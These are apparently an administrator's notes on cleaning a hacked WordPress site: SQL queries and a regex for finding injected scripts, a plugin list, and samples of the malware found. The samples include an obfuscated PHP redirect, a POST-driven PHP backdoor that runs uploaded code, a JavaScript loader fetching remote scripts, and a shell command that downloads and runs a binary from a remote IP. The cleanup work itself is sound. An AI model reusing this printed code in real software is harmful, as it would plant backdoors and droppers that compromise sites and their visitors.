Change ''siteurl" & "home" value from the 'options' table:
<aside> 💡 Use Search & Replace for Wordpress
</aside>
UPDATE `mod538_options` SET `option_value`='<https://mydomain.com>' WHERE `option_name` = 'siteurl'
UPDATE `mod538_options` SET `option_value`='<https://mydomain.com>' WHERE `option_name` = 'home'
SELECT * FROM mod538_posts WHERE post_content LIKE '%<iframe%'
UNION
SELECT * FROM mod538_posts WHERE post_content LIKE '%<noscript%'
UNION
SELECT * FROM mod538_posts WHERE post_content LIKE '%display:%'
Search for strings like in all tables:
# Create regex fo query parameter 'n' (a-z1-9)
# /^[a-z]+\\.js\\?[a-z]+=\\w{3,}$/
<script src='<https://irc.lovegreenpencils.ga/stat.js?n=ns1>' type='text/javascript'></script>
Delete this piece of code from files, search from the root folder (e.q /var/www):
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50));?>
<script type="text/javascript" src="'.chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(109).chr(97).chr(105).chr(110).chr(46).chr(116).chr(114).chr(97).chr(118).chr(101).chr(108).chr(102).chr(111).chr(114).chr(110).chr(97).chr(109).chr(101).chr(119).chr(97).chr(108).chr(107).chr(105).chr(110).chr(103).chr(46).chr(103).chr(97).chr(47).chr(100).chr(101).chr(116).chr(46).chr(112).chr(104).chr(112).chr(63).chr(118).chr(61).chr(53).'"></script>
<?php error_reporting(0);ini_set('display_errors', 0); if(isset($_POST['m']) && md5($_POST['m']) == "8b83a84918c63d1e9b9ab82e07e20539" ) {$a = base64_decode($_POST['a']);file_put_contents('_a','<?php '.$a);$a='_a';if(file_exists($a)){include($a);unlink($a);}} ?><script type='text/javascript' src='<https://main.travelfornamewalking.ga/m.js?w=085>'></script>
I guess attack as been made on all-in-one-wp-security-and-firewall
Found _a file at the plugin's root:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
<?php $a = 'ulimit -n 234234;cd /tmp;mkdir ktsyrtrtt3;chmod 777 ktsyrtrtt3;cd ktsyrtrtt3;rm -f ktsyrtrtt3;wget -O ktsyrtrtt3 <http://95.181.172.55/8658/ktsyrtrtt;chmod> 777 ktsyrtrtt3;nohup "./ktsyrtrtt3" >> /dev/null 2>&1 & echo $!';shell_exec($a);
SELECT * FROM `mod538_options` where option_name = "active_plugins"
Plugins activated in wp_options:
a:23:{i:1;s:53:"amr-shortcode-any-widget/amr-shortcode-any-widget.php";i:2;s:45:"astoundify-favorites/astoundify-favorites.php";i:3;s:35:"cookie-law-info/cookie-law-info.php";i:4;s:50:"google-analytics-for-wordpress/googleanalytics.php";i:5;s:19:"if-menu/if-menu.php";i:6;s:37:"mailchimp-for-wp/mailchimp-for-wp.php";i:7;s:39:"mailchimp-top-bar/mailchimp-top-bar.php";i:8;s:27:"ninja-forms/ninja-forms.php";i:9;s:45:"olympus-google-fonts/olympus-google-fonts.php";i:10;s:27:"popup-maker/popup-maker.php";i:11;s:47:"really-simple-ssl/rlrsssl-really-simple-ssl.php";i:12;s:27:"redirection/redirection.php";i:13;s:39:"super-progressive-web-apps/superpwa.php";i:14;s:37:"syntax-highlight/syntax-highlight.php";i:15;s:35:"ultimate-member/ultimate-member.php";i:16;s:27:"updraftplus/updraftplus.php";i:17;s:27:"woocommerce/woocommerce.php";i:18;s:24:"wordpress-seo/wp-seo.php";i:19;s:65:"wp-job-manager-contact-listing/wp-job-manager-contact-listing.php";i:20;s:63:"wp-job-manager-listing-labels/wp-job-manager-listing-labels.php";i:21;s:53:"wp-job-manager-locations/wp-job-manager-locations.php";i:22;s:33:"wp-job-manager/wp-job-manager.php";i:23;s:71:"yikes-inc-easy-mailchimp-extender/yikes-inc-easy-mailchimp-extender.php";}
SELECT * FROM `mod538_options` where option_name = "sidebars_widgets"
Widgets activated in wp_options:
a:14:{s:19:"wp_inactive_widgets";a:17:{i:0;s:10:"archives-2";i:1;s:6:"meta-2";i:2;s:8:"search-2";i:3;s:12:"categories-2";i:4;s:12:"categories-4";i:5;s:14:"recent-posts-2";i:6;s:17:"recent-comments-2";i:7;s:11:"tag_cloud-3";i:8;s:10:"nav_menu-6";i:9;s:32:"woocommerce_product_categories-3";i:10;s:32:"listify_widget_author_listings-3";i:11;s:32:"listify_widget_author_listings-4";i:12;s:35:"listify_widget_panel_listing_tags-2";i:13;s:38:"listify_widget_panel_listing_content-2";i:14;s:39:"listify_widget_panel_listing_comments-2";i:15;s:38:"listify_widget_panel_listing_gallery-2";i:16;s:34:"listify_widget_panel_listing_map-2";}s:21:"widget-area-sidebar-1";a:3:{i:0;s:8:"search-4";i:1;s:6:"text-3";i:2;s:14:"recent-posts-4";}s:16:"widget-area-home";a:6:{i:0;s:32:"listify_widget_recent_listings-1";i:1;s:36:"listify_widget_taxonomy_image_grid-1";i:2;s:25:"listify_widget_features-1";i:3;s:32:"listify_widget_feature_callout-1";i:4;s:29:"listify_widget_recent_posts-4";i:5;s:24:"listify_call_to_action-1";}s:20:"widget-area-footer-1";a:1:{i:0;s:6:"text-1";}s:20:"widget-area-footer-2";a:1:{i:0;s:6:"text-7";}s:20:"widget-area-footer-3";a:0:{}s:23:"widget-area-author-main";a:0:{}s:26:"widget-area-author-sidebar";a:0:{}s:27:"widget-area-sidebar-product";a:0:{}s:24:"widget-area-sidebar-shop";a:0:{}s:19:"archive-job_listing";a:0:{}s:30:"single-job_listing-widget-area";a:5:{i:0;s:38:"listify_widget_panel_listing_content-1";i:1;s:35:"listify_widget_panel_listing_tags-4";i:2;s:36:"listify_widget_panel_listing_video-1";i:3;s:39:"listify_widget_panel_listing_comments-1";i:4;s:36:"listify_widget_panel_listing_video-2";}s:18:"single-job_listing";a:4:{i:0;s:34:"listify_widget_panel_listing_map-1";i:1;s:46:"listify_widget_panel_listing_social_profiles-1";i:2;s:38:"listify_widget_panel_listing_gallery-1";i:3;s:46:"listify_widget_panel_listing_social_profiles-2";}s:13:"array_version";i:3;}
Create a node.js script with dictionnary. Source: